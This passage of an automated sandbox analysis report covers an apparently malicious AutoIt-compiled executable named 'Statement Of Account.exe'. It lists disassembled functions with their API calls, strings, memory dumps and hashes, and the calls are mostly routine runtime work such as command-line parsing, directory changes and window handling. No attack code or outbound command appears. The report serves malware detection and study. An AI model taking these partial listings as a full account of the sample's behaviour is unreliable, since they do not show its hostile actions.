Instruction Fuzzy Hash: 907186B2504300ABC720EB65C885FEBB3E8AF94714F148D1FF58997142E679E648C75A

Function 00401F80 Relevance: 28.2, APIs: 8, Strings: 8, Instructions: 213COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Statement Of Account.exe,00000104,?,?,?,?,00000000), ref: 00401FAD

Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71

__wcsicoll.LIBCMT ref: 00402078
__wcsicoll.LIBCMT ref: 0040208E
__wcsicoll.LIBCMT ref: 004020A4

Part of subcall function 004115D0: __wcsicmp_l.LIBCMT ref: 00411657

__wcsicoll.LIBCMT ref: 004020BA
_wcscpy.LIBCMT ref: 004020EF
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Statement Of Account.exe,00000104,?,?,?,?,?,00000000), ref: 0042C1CF

Strings

/ErrorStdOut, xrefs: 00402073
CMDLINE, xrefs: 00402002
HH, xrefs: 004021A7
C:\Users\user\Desktop\Statement Of Account.exe, xrefs: 00401FA7, 00401FB3, 00401FC7, 004020EA, 0040210B, 0042C1BC, 0042C21A
/AutoIt3OutputDebug, xrefs: 00402089
/AutoIt3ExecuteScript, xrefs: 004020B5
CMDLINERAW, xrefs: 00401FD6
/AutoIt3ExecuteLine, xrefs: 0040209F

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: __wcsicoll$FileModuleName$__wcsicmp_l_wcscpy_wcslen
String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$C:\Users\user\Desktop\Statement Of Account.exe$CMDLINE$CMDLINERAW$HH
API String ID: 961030850-2714325266
Opcode ID: 77788b6be3a4a64bb089d4fc1f5bcdb43af4f6c02b082138669a94b85167ea50
Instruction ID: c9d3c3b6fe5feff8818da943e354889f8ac14309cfa4db165b48fafa4d4d28ea
Opcode Fuzzy Hash: 77788b6be3a4a64bb089d4fc1f5bcdb43af4f6c02b082138669a94b85167ea50
Instruction Fuzzy Hash: 3771B9715083069BC610FF51DC42A5F7BA49F91388F44083FB941671E2EBB8A94DCBDA

Function 00476A8A Relevance: 27.3, APIs: 18, Instructions: 332COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00476AA0

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: InitVariant
String ID:
API String ID: 1927566239-0
Opcode ID: 0ce8a0180f427c6633dd7a645a706da8f2470da33a28fd12fcc8bbcffff15558
Instruction ID: b17386a2766a1a739d91313a8bf0106a5dd250ff49ec0cac6ee5761d63536315
Opcode Fuzzy Hash: 0ce8a0180f427c6633dd7a645a706da8f2470da33a28fd12fcc8bbcffff15558
Instruction Fuzzy Hash: 87A1F5766146019FC300EF65D88499FB7AAFF85315F408D3EFA49C3211D77AD4098BAA

Function 0045DE12 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 190timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 0045DED4
SystemTimeToFileTime.KERNEL32(?,?), ref: 0045DEE4
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0045DEF0
_wcsncpy.LIBCMT ref: 0045DF0F
__wsplitpath.LIBCMT ref: 0045DF54
_wcscat.LIBCMT ref: 0045DF6C
_wcscat.LIBCMT ref: 0045DF7E
GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0045DF93
SetCurrentDirectoryW.KERNEL32(?), ref: 0045DFA7
SetCurrentDirectoryW.KERNEL32(?), ref: 0045DFE5
SetCurrentDirectoryW.KERNEL32(?), ref: 0045DFFB
SetCurrentDirectoryW.KERNEL32(?), ref: 0045E00D
_wcscpy.LIBCMT ref: 0045E019
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0045E05F

Strings

*.*, xrefs: 0045E013

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: CurrentDirectory$Time$File$Local_wcscat$System__wsplitpath_wcscpy_wcsncpy
String ID: *.*
API String ID: 3201719729-438819550
Opcode ID: 89541da3f554ebb8d42e95f45bc66f31ca584aff69b040987f949bd9346ecb30
Instruction ID: 9ef8ac46b2ec3f8a2b66e183c5d6435db2730cdd54c1860218fefef83dfd89d7
Opcode Fuzzy Hash: 89541da3f554ebb8d42e95f45bc66f31ca584aff69b040987f949bd9346ecb30
Instruction Fuzzy Hash: D061A7B25043049BC724EF65C881E9FB3E8AF94704F048E1EF98987241DB79E949CB96

Function 0043737D Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 83windowCOMMON

Download Yara Rule

APIs

__wcsicoll.LIBCMT ref: 0043739E
__wcsicoll.LIBCMT ref: 00437451
LoadIconW.USER32(00000000,00007F04), ref: 00437467

Strings

info, xrefs: 0043744B
blank, xrefs: 00437398
stop, xrefs: 004373E0
question, xrefs: 004373BD
warning, xrefs: 00437403

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: __wcsicoll$IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2485277191-404129466
Opcode ID: 5bed60ec3368b378429e4d7d86c3e9ed6cb6a0c6f582f3c961ebbe10ae210b10
Instruction ID: 3fdcc892c2a25cebf9aff257507665a297d4e16c4260cb8f6e9492a672fb13e0
Opcode Fuzzy Hash: 5bed60ec3368b378429e4d7d86c3e9ed6cb6a0c6f582f3c961ebbe10ae210b10
Instruction Fuzzy Hash: CB2128B6B08301A7D610A725BC05FDF27489FA8365F004C2BF941E2283F3A8A45583BD

Function 00428604 Relevance: 25.8, APIs: 17, Instructions: 306stringCOMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(?,?,004832AC,00000001,004832AC,00000001), ref: 00428611
GetLastError.KERNEL32(?,?,004832AC,00000001,004832AC,00000001), ref: 00428627
strncnt.LIBCMT ref: 00428646
strncnt.LIBCMT ref: 0042865A

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: strncnt$CompareErrorLastString
String ID:
API String ID: 1776594460-0
Opcode ID: 409d39d31d49c90a4132468ed3074cd5345a98ee66abf4e21a74ff80ab18450e
Instruction ID: 056e5a993d73ec50dc3c8e072878bb631c9b69e1f80941a2a69bbd8adeb14d7f
Opcode Fuzzy Hash: 409d39d31d49c90a4132468ed3074cd5345a98ee66abf4e21a74ff80ab18450e
Instruction Fuzzy Hash: 0DA1B131B01225AFDF219F61EC41AAF7BB6AF94340FA4402FF81196251DF3D8891CB58

Function 004545C9 Relevance: 25.7, APIs: 17, Instructions: 198windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(?,00000063), ref: 004545DA
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 004545EC
SetWindowTextW.USER32(?,?), ref: 00454606
GetDlgItem.USER32(?,000003EA), ref: 0045461F
SetWindowTextW.USER32(00000000,?), ref: 00454626
GetDlgItem.USER32(?,000003E9), ref: 00454637
SetWindowTextW.USER32(00000000,?), ref: 0045463E
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00454663
SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 0045467D
GetWindowRect.USER32(?,?), ref: 00454688
SetWindowTextW.USER32(?,?), ref: 004546FD
GetDesktopWindow.USER32 ref: 00454708
GetWindowRect.USER32(00000000), ref: 0045470F
MoveWindow.USER32(?,?,00000000,?,?,00000000), ref: 00454760
GetClientRect.USER32(?,?), ref: 0045476F
PostMessageW.USER32(?,00000005,00000000,?), ref: 0045479E
SetTimer.USER32(?,0000040A,?,00000000), ref: 004547E9

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
String ID:
API String ID: 3869813825-0
Opcode ID: d6d25c813e590b752cbfd9858452ff05e3d443d6a6ce6916d89e520ab15b373f
Instruction ID: 4e77de65cc6986e78e6be143d0a4b9e7f39e78804b6f4fc71fe9e35dfcfd5046
Opcode Fuzzy Hash: d6d25c813e590b752cbfd9858452ff05e3d443d6a6ce6916d89e520ab15b373f
Instruction Fuzzy Hash: 8C616D71604701AFD320DF68CD88F2BB7E8AB88709F004E1DF98697691D7B8E849CB55

Function 00458D1C Relevance: 25.6, APIs: 17, Instructions: 112COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F8A), ref: 00458D2D
LoadCursorW.USER32(00000000,00007F00), ref: 00458D3A
LoadCursorW.USER32(00000000,00007F03), ref: 00458D47
LoadCursorW.USER32(00000000,00007F8B), ref: 00458D54
LoadCursorW.USER32(00000000,00007F01), ref: 00458D61
LoadCursorW.USER32(00000000,00007F81), ref: 00458D6E
LoadCursorW.USER32(00000000,00007F88), ref: 00458D7B
LoadCursorW.USER32(00000000,00007F80), ref: 00458D88
LoadCursorW.USER32(00000000,00007F86), ref: 00458D95
LoadCursorW.USER32(00000000,00007F83), ref: 00458DA2
LoadCursorW.USER32(00000000,00007F85), ref: 00458DAF
LoadCursorW.USER32(00000000,00007F82), ref: 00458DBC
LoadCursorW.USER32(00000000,00007F84), ref: 00458DC9
LoadCursorW.USER32(00000000,00007F04), ref: 00458DD6
LoadCursorW.USER32(00000000,00007F02), ref: 00458DE3
LoadCursorW.USER32(00000000,00007F89), ref: 00458DF0
GetCursorInfo.USER32 ref: 00458E03

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: Cursor$Load$Info
String ID:
API String ID: 2577412497-0
Opcode ID: 0c78b259ae472df09145ddf792cd37f85d2c816b82f1d484569203a38ef646a1
Instruction ID: 36b4ee280ed0253346847529aeb00c95e660e1b7f2a6688567eec4957a26740b
Opcode Fuzzy Hash: 0c78b259ae472df09145ddf792cd37f85d2c816b82f1d484569203a38ef646a1
Instruction Fuzzy Hash: D9311671E4C3156AE7509F758C5AB1BBEE0AF40B54F004D2FF2889F2D1DAB9E4448B86

Function 0046D6EB Relevance: 25.0, APIs: 5, Strings: 9, Instructions: 474COMMON

Download Yara Rule

APIs

Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2

GetForegroundWindow.USER32(?,?), ref: 0046D7C1
GetForegroundWindow.USER32 ref: 0046DBA4
IsWindow.USER32(?), ref: 0046DBDE
GetDesktopWindow.USER32 ref: 0046DCB5
EnumWindows.USER32(00460772,?), ref: 0046DCC4

Part of subcall function 00445975: _wcslen.LIBCMT ref: 00445984

Strings

TITLE, xrefs: 0046DACA
REGEXPTITLE, xrefs: 0046D8BE
REGEXPCLASS, xrefs: 0046D95E
INSTANCE, xrefs: 0046DA63
CLASS, xrefs: 0046D92F
LAST, xrefs: 0046D870
HANDLE, xrefs: 0046D8A4
ACTIVE, xrefs: 0046D88A
ALL, xrefs: 0046DA95

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: Window$Foreground_wcslen$DesktopEnumWindows
String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
API String ID: 922037996-1919597938
Opcode ID: f0ae0bd5c84c8fbd9fa80e8b17a650ade3f6139d63811c55da114ce2128ba9af
Instruction ID: 252cd24da08a8cddfda52e39780f3f39bafd894638fb43d2866a45805a666b3e
Opcode Fuzzy Hash: f0ae0bd5c84c8fbd9fa80e8b17a650ade3f6139d63811c55da114ce2128ba9af
Instruction Fuzzy Hash: 96F1C571D143409BCB00EF61C881EAB73A4BF95308F44496FF9456B286E77DE909CB6A

Function 004680EB Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 204windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00468107
GetMenuItemInfoW.USER32(?,00000007,00000000,?), ref: 00468190
GetMenuItemCount.USER32(?), ref: 00468227
DeleteMenu.USER32(?,00000005,00000000), ref: 004682B8
DeleteMenu.USER32(?,00000004,00000000), ref: 004682C1
DeleteMenu.USER32(?,00000006,00000000,?,00000004,00000000), ref: 004682CA
DeleteMenu.USER32(00000000,00000003,00000000,?,00000006,00000000,?,00000004,00000000), ref: 004682D3
GetMenuItemCount.USER32 ref: 004682DC
SetMenuItemInfoW.USER32 ref: 00468317
GetCursorPos.USER32(00000000), ref: 00468322
SetForegroundWindow.USER32(?), ref: 0046832D
TrackPopupMenuEx.USER32(?,00000000,00000000,00000006,?,00000000,?,?,00000006,00000000,?,00000004,00000000), ref: 00468345
PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00468352

Strings

0, xrefs: 004680FF

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
String ID: 0
API String ID: 3993528054-4108050209
Opcode ID: d5573be1ba1a613c106f8e764602a2d45d8b266f51cd1eb04f60dea375430468
Instruction ID: a450cccb4b36e122d1eca3afa35c85d1e57e2007e4dd5bc50ce81cada7f4397f
Opcode Fuzzy Hash: d5573be1ba1a613c106f8e764602a2d45d8b266f51cd1eb04f60dea375430468
Instruction Fuzzy Hash: 3C71C070648301ABE3309B14CC49F5BB7E8BF86724F244B0EF5A5563D1DBB9A8458B1B

Function 0044B988 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 73COMMON

Download Yara Rule

APIs

__wcsicoll.LIBCMT ref: 0044B99D
__wcsicoll.LIBCMT ref: 0044B9B3
__wcsicoll.LIBCMT ref: 0044BA41

Strings

MIDDLE, xrefs: 0044BA3B
MENU, xrefs: 0044B9EA
MAIN, xrefs: 0044B9C6
PRIMARY, xrefs: 0044B9D8
LEFT, xrefs: 0044B997
RIGHT, xrefs: 0044B9AD
SECONDARY, xrefs: 0044B9FC

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: __wcsicoll
String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
API String ID: 3832890014-4202584635
Opcode ID: 3f0b73fdde0a53fb0a00575eab05b85141dd4a2dcfcc4ab19f269ee93bd0b8a8
Instruction ID: bf73cd225697d97a5a257e466bf5c8c79b4efa22739c650e03c6b1f9c6e9338c
Opcode Fuzzy Hash: 3f0b73fdde0a53fb0a00575eab05b85141dd4a2dcfcc4ab19f269ee93bd0b8a8
Instruction Fuzzy Hash: 1D01616160562122FE11322A7C03BDF15898F5139AF14447BFC05F1282FF4DDA8692EE

Function 0044A0EA Relevance: 24.2, APIs: 16, Instructions: 196windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32 ref: 0044A11D
GetClientRect.USER32(?,?), ref: 0044A18D
SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A1A6
GetPixel.GDI32(00000000,?,?), ref: 0044A1C6
GetSysColor.USER32(0000000F), ref: 0044A1EC
GetSysColor.USER32(0000000F), ref: 0044A216
GetSysColor.USER32(00000005), ref: 0044A21E
GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A28A
GetPixel.GDI32(00000000,?,00000000), ref: 0044A29F
GetPixel.GDI32(00000000,00000000,?), ref: 0044A2B4
GetPixel.GDI32(00000000,?,?), ref: 0044A2D0
SetTextColor.GDI32(00000000,?), ref: 0044A2F6
SetBkMode.GDI32(00000000,00000001), ref: 0044A30A
GetStockObject.GDI32(00000005), ref: 0044A312
SetBkColor.GDI32(00000000,00000000), ref: 0044A328

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: Color$Pixel$ClientMessageModeObjectRectSendStockText
String ID:
API String ID: 4000845554-0
Opcode ID: c697551d262e08263a45fd1ab6b47457a8b4de30e4a023901e5f3e03e0b3260a
Instruction ID: f407f88e1fc9bdd08975b2e96734b256c85d8f08b0ead5e1f8dbf5832e348edb
Opcode Fuzzy Hash: c697551d262e08263a45fd1ab6b47457a8b4de30e4a023901e5f3e03e0b3260a
Instruction Fuzzy Hash: AD6148315442016BE3209B388C88BBFB7A4FB49324F54079EF9A8973D0D7B99C51D76A

Function 0045F48E Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 226windowsleepCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0045F4AE
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0045F519
SetMenuItemInfoW.USER32(00000008,00000004,00000000,?), ref: 0045F556
Sleep.KERNEL32(000001F4,?,?,00000000,?), ref: 0045F568

Strings

0, xrefs: 0045F4A6

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: InfoItemMenu$Sleep_memset
String ID: 0
API String ID: 1504565804-4108050209
Opcode ID: b2eb264578549714347dca4c6cc1c63db220fd8d89572d1a81e0d1d82c6caf25
Instruction ID: 9e8996cb251b45e9fd8013479734a73363ce4640cf951279a7d2fdadd0934edb
Opcode Fuzzy Hash: b2eb264578549714347dca4c6cc1c63db220fd8d89572d1a81e0d1d82c6caf25
Instruction Fuzzy Hash: E171E3711043406BD3109F54DD48FABBBE8EBD5306F04086FFD8587252D6B9A94EC76A

Function 0045CBCC Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 202COMMON

Download Yara Rule

APIs

_wcsncpy.LIBCMT ref: 0045CCFA
__wsplitpath.LIBCMT ref: 0045CD3C
_wcscat.LIBCMT ref: 0045CD51
_wcscat.LIBCMT ref: 0045CD63
GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,00000104,?), ref: 0045CD78
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,00000104,?), ref: 0045CD8C

Part of subcall function 00436AC4: GetFileAttributesW.KERNEL32(?,0044BD82,?,?,?), ref: 00436AC9

GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CDD0
SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CDE6
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CDF8
SetCurrentDirectoryW.KERNEL32(?), ref: 0045CE08
_wcscpy.LIBCMT ref: 0045CE14
